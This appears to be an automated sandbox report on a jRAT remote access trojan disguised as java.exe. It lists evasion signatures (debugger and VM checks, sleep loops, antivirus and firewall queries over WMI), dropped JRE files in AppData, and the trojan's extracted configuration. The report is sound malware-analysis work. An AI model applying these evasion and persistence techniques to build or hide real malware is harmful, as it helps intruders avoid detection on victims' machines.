Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libzip\zip.pdb source: zip.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\jre-image\bin\javaws.pdb source: javaws.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\javacpl\obj\javacpl.pdb4 source: javacpl.cpl.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: pack200.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjava_crw_demo\java_crw_demo.pdb98 source: java_crw_demo.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\deploy\plugin\npdeployJava1\obj\npdeployJava1.pdb source: npdeployJava1.dll.17.dr
Source:	Binary string: msvcr120.i386.pdb source: msvcr120.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjpeg\jpeg.pdb source: jpeg.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: dt_socket.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\jre-image\bin\deploy.pdb source: deploy.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdb source: npjp2.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\jp2ssv\obj\jp2ssv.pdb source: jp2ssv.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: w2k_lsa_auth.dll.17.dr
Source:	Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: java.exe
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libhprof_jvmti\hprof.pdbi source: hprof.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libunpack\unpack.pdbY source: unpack.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libfontmanager\fontmanager.pdb source: fontmanager.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjsdt\jsdt.pdb source: jsdt.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: rmid.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjava_crw_demo\java_crw_demo.pdb source: java_crw_demo.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\deploy\tmp\jp2ssv\obj\jp2ssv.pdb source: jp2ssv.dll.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libverify\verify.pdb source: verify.dll.17.dr
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: java.exe
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: policytool.exe.17.dr
Source:	Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\build\windows-i586\jdk\objs\libjsound\jsound.pdbIC source: jsound.dll.17.dr

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: cmd.exe, java.exe	Binary or memory string: Progman
Source: deploy.dll.17.dr	Binary or memory string: [mwndProcID was NULL in mainLoop()wndProc(JIJJ)JNULL != hIcon../../src/common/windows/native/WindowsJavaTrayIcon.cppTrayNotifyWndShell_TrayWndUnable to Start Java Plug-in Control Panel%s\javacpl.exeJava Sys Tray
Source: cmd.exe, java.exe	Binary or memory string: Program Manager
Source: cmd.exe, java.exe	Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe

Memory protected: page read and write and page guard

Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcr120.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp120.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll	Jump to dropped file
Source: C:\Windows\System32\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\cscript.exe TID: 3660	Thread sleep time: -60000s >= -60000s	Jump to behavior
Source: C:\Windows\System32\cscript.exe TID: 3704	Thread sleep time: -60000s >= -60000s	Jump to behavior
Source: C:\Windows\System32\cscript.exe TID: 3792	Thread sleep time: -60000s >= -60000s	Jump to behavior
Source: C:\Windows\System32\cscript.exe TID: 3852	Thread sleep time: -60000s >= -60000s	Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: java.exe	Binary or memory string: VmCipher.AES_256/CFB/NoPadding
Source: jdwp.dll.17.dr	Binary or memory string: JVM version %s (%s, %s)<unknown>VirtualMachineImpl.cRedefineClassesGetTopThreadGroupsJNI_FALSENewStringUTF;DeleteWeakGlobalRefsignature bagsignaturesclassTrack.cloaded classesclassTrack tableNewWeakGlobalRefsignatureKlassNodeAttempting to insert duplicate classloaded classes arraySetTagcommonRef.cDeleteGlobalRefFreeing %d (%x)
Source: jvm.dll.17.dr	Binary or memory string: _well_known_klasses[SystemDictionary::VirtualMachineError_klass_knum]
Source: java.exe	Binary or memory string: %com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe	Binary or memory string: VMWARE
Source: rt.jar.17.dr	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.class
Source: jvm.dll.17.dr	Binary or memory string: Unable to link/verify VirtualMachineError class
Source: jvm.dll.17.dr	Binary or memory string: m{constant pool}CodeCache Oops C-heap JNIHandles MetaspaceAux SystemDictionary CodeCache StringTable SymbolTable Heap Threads [Verifying Genesis-2147483648Unable to link/verify Finalizer.register methodUnable to link/verify ClassLoader.addClass methodProtectionDomain.impliesCreateAccessControlContext() has the wrong linkageUnable to link/verify Unsafe.throwIllegalAccessError methodJava heap space: failed reallocation of scalar replaced objectsGC overhead limit exceededRequested array size exceeds VM limitCompressed class spaceJava heap spaceUnable to link/verify VirtualMachineError classC:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\hotspot\src\share\vm\oops\arrayKlass.cpp[]guarantee(component_mirror()->klass() != NULL) failedshould have a classC:\workspace\8-2-build-windows-i586-cygwin\jdk8u144\9417\hotspot\src\share\vm\gc_interface/collectedHeap.inline.hpp - length: %dguarantee(a->length() >= 0) failedarray with negative length?guarantee(obj->is_array()) failedmust be arrayshould be klassguarantee
Source: jvm.dll.17.dr, classlist.17.dr	Binary or memory string: java/lang/VirtualMachineError
Source: rt.jar.17.dr	Binary or memory string: #com/sun/corba/se/impl/util/SUNVMCID
Source: java.exe	Binary or memory string: VMWARE0
Source: java.exe	Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: jdwp.dll.17.dr	Binary or memory string: VirtualMachineImpl.c
Source: nashorn.jar.17.dr	Binary or memory string: d/gQemu
Source: java.exe	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: java.exe	Binary or memory string: VMWARES
Source: java.exe, classes.jsa.17.dr	Binary or memory string: cjava/lang/VirtualMachineError
Source: java.exe	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: rt.jar.17.dr	Binary or memory string: )com/sun/corba/se/impl/util/SUNVMCID.class
Source: java.exe	Binary or memory string: 6aq[Ljava/lang/VirtualMachineError;

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Show sources

Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from AntiVirusProduct
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from FirewallProduct

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Java\jre1.8.0_144\bin\java.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

Remote Access Functionality:

Persistence and Installation Behavior:

Data Obfuscation:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Behavior Graph